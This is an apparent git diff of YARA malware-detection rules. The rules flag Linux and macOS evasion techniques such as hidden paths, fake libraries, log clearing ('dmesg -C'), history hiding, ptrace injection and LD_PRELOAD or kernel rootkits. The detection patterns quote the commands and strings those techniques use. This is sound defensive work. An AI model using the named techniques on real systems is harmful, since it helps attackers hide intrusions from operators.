+
+ strings:
+ $ref = /\/proc\/[%{$][\/\$\w\}]{0,12}/
+ $stat = "/proc/stat"
+ $net_den = "/proc/net/dev"
+ $proc_exe = "/proc/%d/exe"
+ $proc_kernel_v = "/proc/sys/kernel/version"
+ $proc_kernel_osrelease = "/proc/sys/kernel/osrelease"
+ $proc_self_maps = "/proc/self/maps"
+ $proc_ngroups_max = "/proc/sys/kernel/ngroups_max"
+ $proc_rtsig_max = "/proc/sys/kernel/rtsig-max"
+ $proc_meminfo = "/proc/meminfo"
+ $proc_cpuinfo = "/proc/cpuinfo"
+
+ condition:
+ filesize < 2MB and int32(0) == 1179403647 and 80 % of them
+}
diff --git a/rules/evasion/file/attr/chflags.yara b/rules/evasion/file/attr/chflags.yara
new file mode 100644
index 000000000..41fcea50d
--- /dev/null
+++ b/rules/evasion/file/attr/chflags.yara
@@ -0,0 +1,11 @@
+rule chflags_hidden: high {
+ meta:
+ description = "hides files using chflags"
+ ref = "https://man.freebsd.org/cgi/man.cgi?chflags(1)"
+
+ strings:
+ $chflags = /chflags.{0,3} hidden [\w\.\/]{0,24}/
+
+ condition:
+ any of them
+}
diff --git a/rules/evasion/covert-location/chdir-unusual.yara b/rules/evasion/file/location/chdir-unusual.yara
similarity index 94%
rename from rules/evasion/covert-location/chdir-unusual.yara
rename to rules/evasion/file/location/chdir-unusual.yara
index 5df099283..ffacd7992 100644
--- a/rules/evasion/covert-location/chdir-unusual.yara
+++ b/rules/evasion/file/location/chdir-unusual.yara
@@ -76,8 +76,10 @@ rule cd_var_subdir: high {
$d_var_run = "cd /var/run"
$d_var_tmp = "cd /var/tmp"
+ $not_var_log_packages = "cd /var/log/packages"
+
condition:
- any of ($d*)
+ any of ($d*) and none of ($not*)
}
rule cd_val_obsessive: critical {
@@ -104,7 +106,7 @@ rule unusual_cd_dev: high {
hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
strings:
- $d_dev = /cd \/dev[\w\/\.]{0,64}/
+ $d_dev = /cd \/dev\/[\w\/\.]{1,64}/
$makedev = "MAKEDEV"
condition:
diff --git a/rules/evasion/covert-location/dev-mqueue.yara b/rules/evasion/file/location/dev-mqueue.yara
similarity index 100%
rename from rules/evasion/covert-location/dev-mqueue.yara
rename to rules/evasion/file/location/dev-mqueue.yara
diff --git a/rules/evasion/covert-location/dev-shm.yara b/rules/evasion/file/location/dev-shm.yara
similarity index 100%
rename from rules/evasion/covert-location/dev-shm.yara
rename to rules/evasion/file/location/dev-shm.yara
diff --git a/rules/evasion/file/location/lib.yara b/rules/evasion/file/location/lib.yara
new file mode 100644
index 000000000..9882dba36
--- /dev/null
+++ b/rules/evasion/file/location/lib.yara
@@ -0,0 +1,35 @@
+rule libsec: medium linux {
+ meta:
+ description = "may pretend to be a fake library"
+
+ strings:
+ $sec = /\/lib\/libsec[\w\.]{0,16}/ fullword
+ $dsx = /\/lib\/libdsx[\w\.]{0,16}/ fullword
+
+ condition:
+ any of them
+}
+
+rule libsec_subdir: high linux {
+ meta:
+ description = "fake security library directory"
+
+ strings:
+ $ref = /\/lib\/libsec[\w\.]{0,16}\/[\.\w\-\%\@]{0,16}/ fullword
+
+ condition:
+ any of them
+}
+
+rule install_to_lib: high linux {
+ meta:
+ description = "may transfer fake libraries into /lib"
+
+ strings:
+ $cp_p = /cp -p [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword
+ $cp = /cp [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword
+ $mv = /mv [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword
+
+ condition:
+ any of them
+}
diff --git a/rules/evasion/file/location/multiple.yara b/rules/evasion/file/location/multiple.yara
new file mode 100644
index 000000000..7039993b6
--- /dev/null
+++ b/rules/evasion/file/location/multiple.yara
@@ -0,0 +1,19 @@
+rule multiple_elf: high linux {
+ meta:
+ description = "references multiple system paths, may be trying to hide content"
+
+ strings:
+ $ = /\/dev\/shm\/[\%\w\-\/\.]{0,64}/
+ $ = /\/dev\/mqueue\/[\%\w\-\/\.]{0,64}/
+ $ = /\/var\/tmp\/[\%\w\-\/\.]{0,64}/
+ $ = /\/tmp\/[\%\w\-\/\.]{0,64}/ fullword
+ $ = /\/bin\/[\%\w\-\/\.]{0,64}/ fullword
+ $ = /\/usr\/bin\/[\%\w\-\/\.]{0,64}/
+ $ = /\/etc\/cron\.d[\%\w\-\/\.]{0,64}/
+ $ = /\/etc\/crontab/
+ $ = /\/var\/log\/[\%\w\-\/\.]{0,64}/
+ $ = /\/var\/spool\/[\%\w\-\/\.]{0,64}/
+
+ condition:
+ filesize < 1MB and uint32(0) == 1179403647 and 80 % of them
+}
diff --git a/rules/evasion/hidden_paths/odd_pidfile.yara b/rules/evasion/file/location/pidfile.yara
similarity index 100%
rename from rules/evasion/hidden_paths/odd_pidfile.yara
rename to rules/evasion/file/location/pidfile.yara
diff --git a/rules/evasion/hide_artifacts/system_directories.yara b/rules/evasion/file/location/system_directory.yara
similarity index 63%
rename from rules/evasion/hide_artifacts/system_directories.yara
rename to rules/evasion/file/location/system_directory.yara
index f70414ddd..9f2bd2899 100644
--- a/rules/evasion/hide_artifacts/system_directories.yara
+++ b/rules/evasion/file/location/system_directory.yara
@@ -1,3 +1,15 @@
+rule cp_to_apple_directory: high {
+ meta:
+ ref = "https://triangletoot.party/@philofishal@infosec.exchange/111211016916902934"
+
+ strings:
+ $cp_to_apple_subdir = /cp [\w\.\"\/ ]{1,128} [\w\. \"\/]{1,64}\/Application Support\/Apple[\.\w\"]{0,32}/
+ $cp_to_com_apple = /cp [\w\.\"\/ ]{1,128} [\w\. \"\/]{1,64}\/com.apple[\.\w\"]{0,32}/
+
+ condition:
+ any of them
+}
+
rule system_fs_manipulator: medium {
meta:
description = "Modifies files within system directories"
diff --git a/rules/evasion/covert-location/var-root.yara b/rules/evasion/file/location/var-root.yara
similarity index 100%
rename from rules/evasion/covert-location/var-root.yara
rename to rules/evasion/file/location/var-root.yara
diff --git a/rules/evasion/hidden_paths/var-run.yara b/rules/evasion/file/location/var-run.yara
similarity index 100%
rename from rules/evasion/hidden_paths/var-run.yara
rename to rules/evasion/file/location/var-run.yara
diff --git a/rules/evasion/hidden_paths/var-tmp.yara b/rules/evasion/file/location/var-tmp.yara
similarity index 100%
rename from rules/evasion/hidden_paths/var-tmp.yara
rename to rules/evasion/file/location/var-tmp.yara
diff --git a/rules/evasion/hidden_paths/x11.yara b/rules/evasion/file/location/x11-unix.yara
similarity index 78%
rename from rules/evasion/hidden_paths/x11.yara
rename to rules/evasion/file/location/x11-unix.yara
index 5ecf54dc8..9145dc33a 100644
--- a/rules/evasion/hidden_paths/x11.yara
+++ b/rules/evasion/file/location/x11-unix.yara
@@ -1,6 +1,6 @@
rule hidden_x11: high {
meta:
- description = "may store content in /tmp/.X11-unix"
+ description = "references content in /tmp/.X11-unix"
ref = "https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/"
strings:
@@ -18,8 +18,9 @@ rule X11: override {
$usr_share = "/usr/share/X11"
$X11Gray = "X11Gray"
$X11_space = "/etc/X11/"
- $X11R6 = "X11R6"
+ $X11R6 = "X11R6/share"
$XForwarding = "X11 forwarding"
+ $X = "/tmp/.X11-unix/X" fullword
condition:
filesize < 10MB and any of them
diff --git a/rules/evasion/alt_location/rename_system_binary.yara b/rules/evasion/file/name/rename_system_binary.yara
similarity index 100%
rename from rules/evasion/alt_location/rename_system_binary.yara
rename to rules/evasion/file/name/rename_system_binary.yara
diff --git a/rules/evasion/hidden_paths/dev_shm.yara b/rules/evasion/file/prefix/dev.yara
similarity index 76%
rename from rules/evasion/hidden_paths/dev_shm.yara
rename to rules/evasion/file/prefix/dev.yara
index 85ad99723..e34995047 100644
--- a/rules/evasion/hidden_paths/dev_shm.yara
+++ b/rules/evasion/file/prefix/dev.yara
@@ -12,3 +12,14 @@ rule dev_shm_hidden: critical linux {
condition:
$dev_shm and not $ignore_mkstemp
}
+
+rule dev_mqueue_hidden: high {
+ meta:
+ description = "path reference within /dev/mqueue (world writeable)"
+
+ strings:
+ $mqueue = /\/dev\/mqueue\/\.[%\w\.\-\/]{0,64}/
+
+ condition:
+ any of them
+}
diff --git a/rules/evasion/file/prefix/lib.yara b/rules/evasion/file/prefix/lib.yara
new file mode 100644
index 000000000..ebcb8ef4b
--- /dev/null
+++ b/rules/evasion/file/prefix/lib.yara
@@ -0,0 +1,26 @@
+rule lib_subdir: high linux {
+ meta:
+ description = "hides paths within a /lib subdirectory"
+
+ strings:
+ $ref = /\/lib\/[\w\.]{1,16}\/\.[\w\-\%\@]{1,16}/ fullword
+
+ condition:
+ any of them
+}
+
+rule hidden_library: high {
+ meta:
+ description = "hidden path in a Library directory"
+ hash_2018_Calisto = "81c127c3cceaf44df10bb3ceb20ce1774f6a9ead0db4bd991abf39db828661cc"
+ hash_2022_CloudMensis_WindowServer = "317ce26cae14dc9a5e4d4667f00fee771b4543e91c944580bbb136e7fe339427"
+ hash_2020_MacOS_TinkaOTP = "90fbc26c65e4aa285a3f7ee6ff8a3a4318a8961ebca71d47f51ef0b4b7829fd0"
+
+ strings:
+ $hidden_library = /\/Library\/\.\w{1,128}/
+ $not_dotdot = "/Library/../"
+ $not_private = "/System/Library/PrivateFrameworks/"
+
+ condition:
+ $hidden_library and none of ($not*)
+}
diff --git a/rules/evasion/hidden_paths/hidden.yara b/rules/evasion/file/prefix/prefix.yara
similarity index 72%
rename from rules/evasion/hidden_paths/hidden.yara
rename to rules/evasion/file/prefix/prefix.yara
index 3601902d3..a2b1df3e3 100644
--- a/rules/evasion/hidden_paths/hidden.yara
+++ b/rules/evasion/file/prefix/prefix.yara
@@ -42,11 +42,13 @@ rule hidden_short_path: high {
description = "hidden short path in a system directory"
strings:
- $crit = /[\w\/\.]{0,32}\/(tmp|usr\/\w{0,8}|bin|lib|LaunchAgents|lib64|var|etc|shm|mqueue|spool|log|Users|Movies|Music|WebServer|Applications|Shared|Library|System)\/\.\w[\w\-\.]{0,2}/ fullword
+ $crit = /[\w\/\.]{0,32}\/(usr\/\w{0,8}|bin|lib|LaunchAgents|lib64|var|etc|shm|mqueue|spool|log|Users|Movies|Music|WebServer|Applications|Shared|Library|System)\/\.\w[\w\-\.]{0,2}/ fullword
$not_network_manager = "org.freedesktop.NetworkManager"
$not_private = "/System/Library/PrivateFrameworks/"
$not_X11 = "/tmp/.X11-unix"
+ $not_XIM = "/tmp/.XIM-unix"
$not_cpp = "/tmp/.cpp.err"
+ $not_pwd = "/etc/.pwd.lock"
condition:
$crit and none of ($not*)
@@ -73,19 +75,3 @@ rule hidden_danger_path: critical {
condition:
$ref
}
-
-rule hidden_library: high {
- meta:
- description = "hidden path in a Library directory"
- hash_2018_Calisto = "81c127c3cceaf44df10bb3ceb20ce1774f6a9ead0db4bd991abf39db828661cc"
- hash_2022_CloudMensis_WindowServer = "317ce26cae14dc9a5e4d4667f00fee771b4543e91c944580bbb136e7fe339427"
- hash_2020_MacOS_TinkaOTP = "90fbc26c65e4aa285a3f7ee6ff8a3a4318a8961ebca71d47f51ef0b4b7829fd0"
-
- strings:
- $hidden_library = /\/Library\/\.\w{1,128}/
- $not_dotdot = "/Library/../"
- $not_private = "/System/Library/PrivateFrameworks/"
-
- condition:
- $hidden_library and none of ($not*)
-}
diff --git a/rules/evasion/hidden_paths/proc.yara b/rules/evasion/file/prefix/proc.yara
similarity index 100%
rename from rules/evasion/hidden_paths/proc.yara
rename to rules/evasion/file/prefix/proc.yara
diff --git a/rules/evasion/file/prefix/tmp.yara b/rules/evasion/file/prefix/tmp.yara
new file mode 100644
index 000000000..ef978adeb
--- /dev/null
+++ b/rules/evasion/file/prefix/tmp.yara
@@ -0,0 +1,17 @@
+rule hidden_short_path: high {
+ meta:
+ description = "hidden short path in a temp directory"
+
+ strings:
+ $crit = /[\w\/\.]{0,32}\/tmp\/\.\w[\w\-\.]{0,2}/ fullword
+ $not_network_manager = "org.freedesktop.NetworkManager"
+ $not_private = "/System/Library/PrivateFrameworks/"
+ $not_X11 = "/tmp/.X11-unix"
+ $not_XIM = "/tmp/.XIM-unix"
+ $not_cpp = "/tmp/.cpp.err"
+ $not_ice = "SESSION_MANAGER" fullword
+ $not_md = "/dev/.tmp.md.%d:%d:%d"
+
+ condition:
+ $crit and none of ($not*)
+}
diff --git a/rules/evasion/hidden_paths/dev_mqueue.yara b/rules/evasion/hidden_paths/dev_mqueue.yara
deleted file mode 100644
index 584e9587f..000000000
--- a/rules/evasion/hidden_paths/dev_mqueue.yara
+++ /dev/null
@@ -1,10 +0,0 @@
-rule dev_mqueue_hidden: high {
- meta:
- description = "path reference within /dev/mqueue (world writeable)"
-
- strings:
- $mqueue = /\/dev\/mqueue\/\.[%\w\.\-\/]{0,64}/
-
- condition:
- any of them
-}
diff --git a/rules/evasion/hide_artifacts/system_directory.yara b/rules/evasion/hide_artifacts/system_directory.yara
deleted file mode 100644
index f6e2c454a..000000000
--- a/rules/evasion/hide_artifacts/system_directory.yara
+++ /dev/null
@@ -1,11 +0,0 @@
-rule cp_to_apple_directory: high {
- meta:
- ref = "https://triangletoot.party/@philofishal@infosec.exchange/111211016916902934"
-
- strings:
- $cp_to_apple_subdir = /cp [\w\.\"\/ ]{1,128} [\w\. \"\/]{1,64}\/Application Support\/Apple[\.\w\"]{0,32}/
- $cp_to_com_apple = /cp [\w\.\"\/ ]{1,128} [\w\. \"\/]{1,64}\/com.apple[\.\w\"]{0,32}/
-
- condition:
- any of them
-}
diff --git a/rules/evasion/hijack_execution/etc-ld.so.preload.yara b/rules/evasion/hijack_execution/etc-ld.so.preload.yara
index edb763205..5e3375b92 100644
--- a/rules/evasion/hijack_execution/etc-ld.so.preload.yara
+++ b/rules/evasion/hijack_execution/etc-ld.so.preload.yara
@@ -25,6 +25,7 @@ rule etc_ld_preload_not_ld: high linux {
$not_env_hwcap = "LD_HWCAP_MASK"
$not_env_audit = "LD_AUDIT"
$not_cache = "ld.so.cache"
+ $not_man = "MAN_DISABLE_SECCOMP"
condition:
$ref and none of ($not*)
diff --git a/rules/evasion/hijack_execution/process-hide.yara b/rules/evasion/hijack_execution/process-hide.yara
deleted file mode 100644
index df35218e1..000000000
--- a/rules/evasion/hijack_execution/process-hide.yara
+++ /dev/null
@@ -1,65 +0,0 @@
-rule elf_processhide: high {
- meta:
- description = "userland rootkit designed to hide processes"
- hash_2023_Unix_Coinminer_Xanthe_0e6d = "0e6d37099dd89c7eed44063420bd05a2d7b0865a0f690e12457fbec68f9b67a8"
- hash_2023_Unix_Malware_Agent_7337 = "73376cbb9666d7a9528b9397d4341d0817540448f62b22b51de8f6a3fb537a3d"
- hash_2023_Unix_Trojan_Prochider_234c = "234c0dd014a958cf5958a9be058140e29f46fca99eb26f5755f5ae935af92787"
-
- strings:
- $prochide = "processhide"
- $process_to_filter = "process_to_filter"
-
- condition:
- all of them
-}
-
-rule linux_process_hider: critical linux {
- meta:
- description = "userland rootkit designed to hide processes"
- ref = "prochid.c"
- hash_2023_OK_c38c = "c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a"
- hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116"
- hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71"
-
- strings:
- $f_proc_self_fd = "/proc/self/fd/%d"
- $f_proc_stat = "/proc/%s/stat"
- $f_readdir = "readdir"
- $f_dlsym = "dlsym"
- $f_readlink = "readlink"
- $x_hide_process = "hide_proc" fullword
- $x_proc_hide = "proc_hide" fullword
- $x_process_hide = "process_hide" fullword
- $x_process_hiding = "process_hiding" fullword
- $x_hidden_proc = "hidden_proc" fullword
- $x_prochide = "processhide"
- $x_process_to_filter = "process_to_filter"
- $x_old_readdir = "old_readdir"
- $x_orig_readdir = "orig_readdir"
- $x_original_readdir = "original_readdir"
- $x_readdirOriginal = "readdirOriginal"
- $x_backdoor = "backdoor" fullword
- $x_is_hidden = "is_hidden" fullword
- $x_hidden_gid = "HIDDEN_GID" fullword
- $x_revshell = "revshell" fullword
- $x_cmdline = "/proc/self/cmdline"
- $not_bpf = "/sys/fs/bpf"
-
- condition:
- filesize < 250KB and all of ($f*) and any of ($x*) and none of ($not*)
-}
-
-rule process_hider: high {
- meta:
- description = "possible userland rootkit designed to hide processes"
-
- strings:
- $hide_process = "hide_proc" fullword
- $proc_hide = "proc_hide" fullword
- $process_hide = "process_hide" fullword
- $process_hiding = "process_hiding" fullword
- $hidden_proc = "hidden_proc" fullword
-
- condition:
- filesize < 250KB and any of them
-}
diff --git a/rules/evasion/indicator_blocking/hidden_window.yara b/rules/evasion/indicator_blocking/hidden_window.yara
new file mode 100644
index 000000000..35d40bb12
--- /dev/null
+++ b/rules/evasion/indicator_blocking/hidden_window.yara
@@ -0,0 +1,54 @@
+rule subprocess_CREATE_NO_WINDOW: medium {
+ meta:
+ description = "runs commands, hides windows"
+
+ strings:
+ $sub = "subprocess"
+ $no_window = "CREATE_NO_WINDOW"
+
+ condition:
+ filesize < 32KB and all of them
+}
+
+private rule pythonSetup {
+ strings:
+ $if_distutils = /from distutils.core import .{0,32}setup/
+ $if_setuptools = /from setuptools import .{0,32}setup/
+ $i_setuptools = "import setuptools"
+ $setup = "setup("
+
+ $not_setup_example = ">>> setup("
+ $not_setup_todict = "setup(**config.todict()"
+ $not_import_quoted = "\"from setuptools import setup"
+ $not_setup_quoted = "\"setup(name="
+ $not_distutils = "from distutils.errors import"
+
+ condition:
+ filesize < 128KB and $setup and any of ($i*) in (0..1024) and none of ($not*)
+}
+
+rule subprocess_CREATE_NO_WINDOW_setuptools: high {
+ meta:
+ description = "runs commands, hides windows"
+
+ strings:
+ $sub = "subprocess"
+ $no_window = "CREATE_NO_WINDOW"
+
+ condition:
+ filesize < 32KB and pythonSetup and all of them
+}
+
+rule subprocess_CREATE_NO_WINDOW_high: high {
+ meta:
+ description = "runs commands, hides windows"
+
+ strings:
+ $s_sub = "subprocess"
+ $s_no_window = "CREATE_NO_WINDOW"
+
+ $o_discord = "discordapp.com"
+
+ condition:
+ filesize < 32KB and all of ($s*) and any of ($o*)
+}
diff --git a/rules/evasion/logging/dev_log.yara b/rules/evasion/logging/dev_log.yara
new file mode 100644
index 000000000..db2901e44
--- /dev/null
+++ b/rules/evasion/logging/dev_log.yara
@@ -0,0 +1,10 @@
+rule full: medium linux {
+ meta:
+ description = "device where local syslog messages are read"
+
+ strings:
+ $val = "/dev/log" fullword
+
+ condition:
+ $val
+}
diff --git a/rules/evasion/logging/dmesg.yara b/rules/evasion/logging/dmesg.yara
new file mode 100644
index 000000000..2d5e6f5e5
--- /dev/null
+++ b/rules/evasion/logging/dmesg.yara
@@ -0,0 +1,13 @@
+rule dmesg_clear: critical linux {
+ meta:
+ description = "clears the kernel log ring buffer"
+
+ strings:
+ $ = "dmesg -C" fullword
+ $ = "dmesg -c" fullword
+ $ = "dmesg --clear" fullword
+ $ = "dmesg --read-clear" fullword
+
+ condition:
+ filesize < 150MB and any of them
+}
diff --git a/rules/evasion/logging/hide_shell_history.yara b/rules/evasion/logging/hide_shell_history.yara
index e29b4c4c1..d6dc08874 100644
--- a/rules/evasion/logging/hide_shell_history.yara
+++ b/rules/evasion/logging/hide_shell_history.yara
@@ -13,7 +13,6 @@ rule hide_shell_history: high {
$h_shopt_history = "shopt -ou history"
$h_set_o_history = "set +o history"
$histsize_0 = "HISTSIZE=0"
- $h_gotcha = "GOTCHA"
$not_increment = "HISTSIZE++"
condition:
diff --git a/rules/evasion/logging/historical_logins.yara b/rules/evasion/logging/historical_logins.yara
index 744adf978..8f348a1a4 100644
--- a/rules/evasion/logging/historical_logins.yara
+++ b/rules/evasion/logging/historical_logins.yara
@@ -1,4 +1,4 @@
-rule login_records: high {
+rule login_records: medium {
meta:
description = "accesses historical login records"
hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6"
diff --git a/rules/evasion/logging/syslog.yara b/rules/evasion/logging/syslog.yara
index 613ecc599..f2bb2e030 100644
--- a/rules/evasion/logging/syslog.yara
+++ b/rules/evasion/logging/syslog.yara
@@ -22,6 +22,7 @@ rule var_log_syslog_elf: high {
$not_syslog_conf = "/etc/syslog.conf"
$not_rsyslog_conf = "/etc/rsyslog.conf"
$not_rsyslog = "RSYSLOG" fullword
+ $not_top = "~/.toprc"
condition:
filesize < 1MB and uint32(0) == 1179403647 and any of ($ref*) and none of ($not*)
diff --git a/rules/evasion/mimicry/fake-library.yara b/rules/evasion/mimicry/fake-library.yara
index 142516adc..fe93f4c0b 100644
--- a/rules/evasion/mimicry/fake-library.yara
+++ b/rules/evasion/mimicry/fake-library.yara
@@ -33,8 +33,10 @@ rule libc_fake_number_val: high {
hash_2023_uacert_refs = "106eef08f3bfcced3e221ee6f789792650386d7794d30c80eae19e42ef893682"
strings:
- $fake_libc_version = /libc.so.[2345789]/
+ $ref = /libc.so.[2345789]/
+ $not_go_example = "libc.so.96.1"
condition:
- any of them
+ $ref and none of ($not*)
}
+
diff --git a/rules/evasion/net/http_443.yara b/rules/evasion/net/http_443.yara
index fc0f2daf4..7d4913ba9 100644
--- a/rules/evasion/net/http_443.yara
+++ b/rules/evasion/net/http_443.yara
@@ -7,6 +7,7 @@ rule http_port_443: high {
$not_test = "assertEqual"
$not_example = "http://example.com:443"
$not_localhost = "http://localhost:443"
+ $not_foo = "http://foo.com:443/"
condition:
$http_443 and none of ($not*)
diff --git a/rules/evasion/process_injection/process-inject.yara b/rules/evasion/process_injection/process-inject.yara
index b214d4f19..7221d4021 100644
--- a/rules/evasion/process_injection/process-inject.yara
+++ b/rules/evasion/process_injection/process-inject.yara
@@ -1,20 +1,3 @@
-rule ptrace_injector: high {
- meta:
- description = "may inject code into other processes"
- hash_2024_procinject_infect = "cb7c09e58c5314e0429ace2f0e1f3ebd0b802489273e4b8e7531ea41fa107973"
-
- strings:
- $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/
- $ptrace = "ptrace" fullword
- $proc = "process" fullword
- $not_qemu = "QEMU_IS_ALIGNED"
- $not_chromium = "CHROMIUM_TIMESTAMP"
- $not_crashpad = "CRASHPAD" fullword
-
- condition:
- filesize < 67108864 and $maps and $ptrace and $proc and none of ($not*)
-}
-
rule library_injector: high {
meta:
description = "may inject code into other processes"
diff --git a/rules/evasion/process_injection/ptrace.yara b/rules/evasion/process_injection/ptrace.yara
index 5ac24b40a..a43eab298 100644
--- a/rules/evasion/process_injection/ptrace.yara
+++ b/rules/evasion/process_injection/ptrace.yara
@@ -12,3 +12,35 @@ rule ptrace: medium {
condition:
any of them
}
+
+rule ptrace_injector: high {
+ meta:
+ description = "may inject code into other processes"
+ hash_2024_procinject_infect = "cb7c09e58c5314e0429ace2f0e1f3ebd0b802489273e4b8e7531ea41fa107973"
+
+ strings:
+ $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/
+ $ptrace = "ptrace" fullword
+ $proc = "process" fullword
+
+ condition:
+ filesize < 67108864 and $maps and $ptrace and $proc
+}
+
+rule known_ptrace_injectors: override {
+ meta:
+ description = "known"
+ ptrace_injector = "medium"
+ proc_d_exe_high = "medium"
+
+ strings:
+ $not_qemu = "QEMU_IS_ALIGNED"
+ $not_chromium = "CHROMIUM_TIMESTAMP"
+ $not_crashpad = "CRASHPAD" fullword
+ $not_perf = "PERF_SAMPLE" fullword
+ $not_trace = "TRACE_REQ" fullword
+ $not_bpf = "BPF" fullword
+
+ condition:
+ ptrace and any of them
+}
diff --git a/rules/evasion/rootkit/kernel.yara b/rules/evasion/rootkit/kernel.yara
new file mode 100644
index 000000000..76fbdddd9
--- /dev/null
+++ b/rules/evasion/rootkit/kernel.yara
@@ -0,0 +1,48 @@
+rule linux_kernel_module_getdents64: critical linux {
+ meta:
+ description = "kernel module that intercepts directory listing"
+ ref = "https://github.com/m0nad/Diamorphine"
+ hash_2022_LQvKibDTq4_diamorphine = "aec68cfa75b582616c8fbce22eecf463ddb0c09b692a1b82a8de23fb0203fede"
+ hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
+ hash_2023_LQvKibDTq4_diamorphine = "d83f43f47c1438d900143891e7a542d1d24f9adcbd649b7698d8ee7585068039"
+ filetypes = "elf,so"
+
+ strings:
+ $getdents64 = "getdents64"
+ $register_kprobe = "register_kprobe"
+
+ condition:
+ filesize < 1MB and all of them
+}
+
+rule funky_high_signal_killer: high {
+ meta:
+ description = "Uses high signals to communicate to a rootkit"
+ hash_2023_Qubitstrike_branch_raw_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd"
+ hash_2023_Qubitstrike_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd"
+ hash_2024_locutus_borg_transwarp = "4573af129e3e1a197050e2fd066f846c92de64d8d14a81a13d975a2cbc6d391e"
+
+ strings:
+ $odd_teen_sig = /kill -1[012346789]/ fullword
+ $high_sig = /kill -[23456]\d/ fullword
+
+ condition:
+ filesize < 10MB and any of them
+}
+
+rule lkm_dirent: high {
+ meta:
+ description = "kernel rootkit designed to hide files (linux_dirent)"
+ hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
+ filetypes = "so"
+
+ strings:
+ $l_dirent = "linux_dirent"
+ $linux = "Linux"
+ $not_syscalls = "#define _LINUX_SYSCALLS_H"
+ $not_itimer = "__kernel_old_itimerval"
+ $not_internal = "internal_getdents"
+
+ condition:
+ filesize < 2MB and all of ($l*) and none of ($not*)
+}
diff --git a/rules/impact/rootkit/refs.yara b/rules/evasion/rootkit/refs.yara
similarity index 100%
rename from rules/impact/rootkit/refs.yara
rename to rules/evasion/rootkit/refs.yara
diff --git a/rules/evasion/rootkit/userspace.yara b/rules/evasion/rootkit/userspace.yara
new file mode 100644
index 000000000..91106a0b2
--- /dev/null
+++ b/rules/evasion/rootkit/userspace.yara
@@ -0,0 +1,155 @@
+rule readdir_intercept_source: high {
+ meta:
+ description = "userland rootkit source designed to hide files (DECLARE_READDIR)"
+ filetypes = "so,c"
+
+ strings:
+ $declare = "DECLARE_READDIR"
+ $hide = "hide"
+
+ condition:
+ filesize < 200KB and all of them
+}
+
+rule readdir_intercept: high {
+ meta:
+ description = "userland rootkit designed to hide files (readdir64)"
+ hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116"
+ hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71"
+ hash_2023_lib_skit = "427b1d16f16736cf8cee43a7c54cd448ca46ac9b573614def400d2d8d998e586"
+ filetypes = "so,c"
+
+ strings:
+ $r_new65 = "readdir64" fullword
+ $r_old64 = "_readdir64"
+ $r_new32 = "readdir" fullword
+ $r_old32 = "_readdir"
+ $not_ld_debug = "LD_DEBUG"
+ $not_libc = "getusershell"
+
+ condition:
+ filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) and none of ($not*)
+}
+
+rule readdir_tcp_wrapper_intercept: high {
+ meta:
+ description = "userland rootkit designed to hide files and bypass tcp-wrappers"
+ ref = "https://github.com/ldpreload/Medusa"
+ filetypes = "so,c"
+
+ strings:
+ $r_new65 = "readdir64" fullword
+ $r_old64 = "_readdir64"
+ $r_new32 = "readdir" fullword
+ $r_old32 = "_readdir"
+ $r_hosts_access = "hosts_access"
+
+ condition:
+ filesize < 2MB and uint32(0) == 1179403647 and all of ($r*)
+}
+
+rule medusa_like_ld_preload: critical linux {
+ meta:
+ description = "LD_PRELOAD rootkit"
+ ref = "https://github.com/ldpreload/Medusa"
+
+ strings:
+ $cloned_thread = "DYNAMIC LINKER BUG!"
+ $__execve = "__execve" fullword
+ $lxstat64 = "__lxstat64" fullword
+ $syslog = "syslog" fullword
+ $LD_PRELOAD = "LD_PRELOAD" fullword
+ $LD_LIBRARY_PATH = "LD_LIBRARY_PATH" fullword
+ $archloaded = "archloaded" fullword
+ $rkload = "rkload" fullword
+ $wcs = "wcsmbsload" fullword
+ $readdir64 = "readdir64" fullword
+
+ condition:
+ filesize < 2MB and 85 % of them
+}
+
+rule linux_rootkit_terms: critical linux {
+ meta:
+ description = "appears to be a Linux rootkit"
+ filetypes = "elf,so"
+
+ strings:
+ $s_Rootkit = "Rootkit"
+ $s_r00tkit = "r00tkit"
+ $s_r00tk1t = "r00tk1t"
+ $s_rootkit = "rootkit" fullword
+
+ $o_systemctl = "systemctl" fullword
+ $o_sshd = "sshd" fullword
+ $o_miner = "miner" fullword
+
+ condition:
+ filesize < 10MB and any of ($s*) and any of ($o*)
+}
+
+rule elf_processhide: high {
+ meta:
+ description = "userland rootkit designed to hide processes"
+ hash_2023_Unix_Coinminer_Xanthe_0e6d = "0e6d37099dd89c7eed44063420bd05a2d7b0865a0f690e12457fbec68f9b67a8"
+ hash_2023_Unix_Malware_Agent_7337 = "73376cbb9666d7a9528b9397d4341d0817540448f62b22b51de8f6a3fb537a3d"
+ hash_2023_Unix_Trojan_Prochider_234c = "234c0dd014a958cf5958a9be058140e29f46fca99eb26f5755f5ae935af92787"
+
+ strings:
+ $prochide = "processhide"
+ $process_to_filter = "process_to_filter"
+
+ condition:
+ all of them
+}
+
+rule linux_process_hider: critical linux {
+ meta:
